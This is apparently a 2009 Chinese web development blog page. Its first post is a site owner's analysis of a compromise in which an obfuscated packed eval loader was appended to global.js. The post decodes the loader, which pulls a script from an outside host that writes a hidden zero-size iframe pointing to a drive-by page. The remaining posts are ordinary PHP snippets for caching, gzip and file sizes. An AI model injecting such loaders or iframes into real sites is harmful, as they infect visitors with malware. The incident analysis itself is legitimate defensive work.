网页与编程 | VGOT Blog

公司网站被挂马

今天登录公司网站后台,超级巡警报警说有木马,郁闷,最近怎么这么倒霉,检查了一下发现是 global.js 文件被修改了,在底部加了代码如下:

JavaScript代码

function goad(){var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ } else { document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.a(\'<6 7=3://9.0.1/5/8.4></6>\')',62,11,'chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln'.split('|'),0,{}));window.status="final";}}goad();

把 eval() 这一段拿出来解成正常格式

JavaScript代码

eval(function(p, a, c, k, e, d) {
e = function(c) {
return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) d[e(c)] = k[c] || e(c);
k = [function(e) {
return d[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
} ('2.a(\'<6 7=3://9.0.1/5/8.4></6>\')', 62, 11, 'chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln'.split('|'), 0, {}));
window.status = "final";
}
}
goad();

看这一段
<6 7=3://9.0.1/5/8.4></6>
还有这一段
'chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln'
根据我自己猜想,它应该是按照数据排序把第一段里面的数字替换了,那么从 chinaw3 为 [0] 的开始依次替换数字就是
<script src=http://ufy9g1.chinaw3.com/s/ss.js></script>
原来是引用了站外的一个脚本文件 http://ufy9g1.chinaw3.com/s/ss.js
下载这个文件,内容是:

JavaScript代码

document.writeln("<iframe width=100 height=0 src=http:\/\/klawesd.cn:6868\/b174152\/b17.htm><\/iframe>")
// A Popular Free Statistics Service for 200 000+ Webmasters.
var a1339tf="51la";var a1339pu="";var a1339pf="51la";var a1339su=window.location;var a1339sf=document.referrer;var a1339of="";var a1339op="";var a1339ops=1;var a1339ot=1;var a1339d=new Date();var a1339color="";if (navigator.appName=="Netscape"){a1339color=screen.pixelDepth;} else {a1339color=screen.colorDepth;}
try{a1339tf=top.document.referrer;}catch(e){}
try{a1339pu =window.parent.location;}catch(e){}
try{a1339pf=window.parent.document.referrer;}catch(e){}
try{a1339ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a1339ops=(a1339ops==null)?1: (parseInt(unescape((a1339ops)[2]))+1);var a1339oe =new Date();a1339oe.setTime(a1339oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a1339ops+ ";path=/;expires="+a1339oe.toGMTString();a1339ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a1339ot==null){a1339ot=1;}else{a1339ot=parseInt(unescape((a1339ot)[2])); a1339ot=(a1339ops==1)?(a1339ot+1):(a1339ot);}a1339oe.setTime(a1339oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a1339ot+";path=/;expires="+a1339oe.toGMTString();}catch(e){}
a1339of=a1339sf;if(a1339pf!=="51la"){a1339of=a1339pf;}if(a1339tf!=="51la"){a1339of=a1339tf;}a1339op=a1339pu;try{lainframe}catch(e){a1339op=a1339su;}document.write('<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=47&id=2481339&tpages='+a1339ops+'&ttimes='+a1339ot+'&tzone='+(0-a1339d.getTimezoneOffset()/60)+'&tcolor='+a1339color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a1339of)+'&vpage='+escape(a1339op)+'" />');
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/866793\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/866793\/ystat.gif\"\/><\/a><\/noscript>");
document.writeln("<a href=\"index.html\"><img src=\'http:\/\/phiex.vicp.net:8080\/count.asp?Referer=<%=Refer%>&Width=\"+escape(screen.width)+\"&Height=\"+escape(screen.height)+\"\' border=0 width=0 height=0><\/a>");

结果发现里面嵌的全部都是统计,我郁闷,这个应该不会有木马啊,我再找,可是怎么找都找不到,看里面一个网页文件是: http://klawesd.cn:6868/b174152/b17.htm 上面的 b174152, 难道利用的是这个漏洞,现在我才感觉到及时补漏洞的重要性.另外在网上查了这个文件 http://ufy9g1.chinaw3.com/s/ss.js 网上说是下载了 http://yasws-05.cn/35/35.exe 些文件,下载下来之后,杀毒软件就报警了
难道就是这个sequence: Packed/Upack? 我太郁闷了,是怎么挂上去的呢?我得查查,毕竟偶不是搞黑客这块,真的很郁闷.

Pader 2009-5-4 0

PHP缓存类更新

缓存真的是个好东西,好玩又有趣.

PHP代码

<?php
/*
常量 CACHE_DIR 定义缓存文件所在目录
*/
define('CACHE_DIR','/data/cache');
class cache {
var $cache = array();
//获取缓存
function getCache($cacheName) {
if(!array_key_exists($cacheName,$this->cache)) {
include $this->cacheFile($cacheName);
$this->cache[$cacheName] = $cache[$cacheName];
}
return $this->cache[$cacheName];
}
//存储缓存
function saveCache($cacheName,$cacheVar){
$cacheCode = "<?php\r\n//Cache create at ".date('Y-m-d H:i:s')."\r\n";
$cacheCode .= '$cache[\''.$cacheName.'\'] = ';
$cacheCode .= $this->createVarCode($cacheVar);
$cacheCode .= ";\r\n";
return $this->writeFile($this->cacheFile($cacheName),$cacheCode) ? true : false;
}
//创建缓存变量原生态代码
function createVarCode($myVar,$level=0) {
$tabEnd = '';
for($i=0;$i<$level;$i++) {
$tabEnd .= "\t";
}
$tab = $tabEnd."\t";
if(is_array($myVar)) {
$varCode = "array(\r\n";
foreach($myVar as $key => $val) {
$key = is_numeric($key) ? $key : '\''.$key.'\'';
if(is_array($val)) {
$varCode .= $tab.$key.' => '.$this->createVarCode($val,$level + 1);
} else {
$varCode .= $tab.$key.' => \''.$this->addslashes($val).'\'';
}
$varCode .= ",\r\n";
}
if($myVar) {
$varCode = substr_replace($varCode,'',-3,1)."$tabEnd)";
}
} else {
$varCode = '\''.$this->addslashes($myVar).'\'';
}
return $varCode;
}
function addslashes($text) {
$text = addcslashes($text,'\\');
$text = addcslashes($text,'\'');
return $text;
}
//返回缓存文件地址
function cacheFile($cacheName) {
$cacheFile = CACHE_DIR.'/'.$cacheName.'.php';
return $cacheFile;
}
//判断缓存文件是否存在
function cacheExists($cacheName) {
$state = file_exists($this->cacheFile($cacheName));
return $state;
}
function deleteCache($cacheName) {
return @unlink($this->cacheFile($cacheName)) ? true : false;
}
function printCache() {
print_r($this->cache);
}
//写文件
function writeFile($fileName,$content,$wmode='w'){
$s = false;
if($fp = @fopen($fileName,$wmode)) {
if(flock($fp,LOCK_EX)) {
$s = @fwrite($fp,$content) ? true : false;
flock($fp,LOCK_UN);
fclose($fp);
}
}
return $s;
}
}

加上这个函数

PHP代码

//从缓存获取并处理
function GetCache($cacheName,$func='') {
global $cache;
!defined('CACHE_FUNC') && require_once API('cache_function');
if($cache->cacheExists($cacheName)) {
$thisCache = $cache->getCache($cacheName);
} elseif($func) {
eval($func.'();');
exit('缓存 <b>'.$cacheName.'</b> 未能找到,系统已经更新,请刷新页面!');
}
return $thisCache;
}

这样子调用

PHP代码

$settings = GetCache('settings','cache_reload_settings'); //从缓存获取设置

我们先定义了一个函灵敏 cache_reload_settings() ,这样 GetCache 函数会先从缓存获取,没有的话就会调用 cache_reload_settings() 函数更新缓存,其实PHP的 var_export 函数让我很郁闷.

Look:

PHP代码

/*
缓存更新函数模块
14:25 2009-4-20
*/
define('CACHE_FUNC',true);
if(!defined('CACHE_DIR')) {
require_once API('cache');
}
if(!$cache) {
$cache = new cache;
}
function cache_reload_settings() {
global $db,$cache;
$settings = array();
$result = $db->query("SELECT * FROM hl_settings");
while($row = $db->fetchArray($result)) {
$settings[$row['n']] = $row['v'];
}
$cache->saveCache('settings',$settings);
}

Pader 2009-4-29 0

PHP 使用 Gzip 压缩

突然要用到,在这里记一下.

PHP代码

function ob_gzip($content) { //GZip压缩函数,放在 ob_start() 内,如 ob_start('ob_gzip') !headers_sent()
if(extension_loaded('zlib')
&& strstr($_SERVER['HTTP_ACCEPT_ENCODING'],'gzip')) {
$content = gzencode($content."\r\n",5);
header('Content-Encoding: gzip');
header('Vary: Accept-Encoding');
header('Content-Length: '.strlen($content));
}
return $content;
}
ob_start('ob_gzip');

Pader 2009-4-27 0

PHP强制浏览器缓存文件以加速浏览

我们通常都会想让浏览器不要缓存PHP的输出以保持更新,以下就是强制不缓存:

PHP代码

header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");

今天在修改我的 OneExplorer 的时候，因为图标都是以 base64 编码嵌入在PHP文件中然后解码输出，所以如果能够把同样的输出强制缓存起来，便可以从很大程度上的提高访问速度并且减轻服务器负担。发现网上关于强制缓存的讨论很少，大都是强制不缓存，看下面的代码：

PHP代码

header("Cache-Control: public");
header("Pragma: cache");
$offset = 60*60*24; //强制缓一天
$ExpStr = "Expires: ".gmdate("D, d M Y H:i:s", time() + $offset)." GMT";
header($ExpStr);

这样我们就可以强制把输出缓存一天，只要浏览的地址不变，就会一直从缓存读取。
[attach=151]
浏览器的临时文件夹，仔细看 截止期限 和 上次检查时间

Pader 2009-4-24 0

php 文件大小单位输出函数

PHP代码

function convertFileSize($size) {
$filesizename = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB");
return $size ? round($size/pow(1024, ($i = floor(log($size, 1024)))), 2) . $filesizename[$i] : '0 Bytes';
}

Pader 2009-4-23 0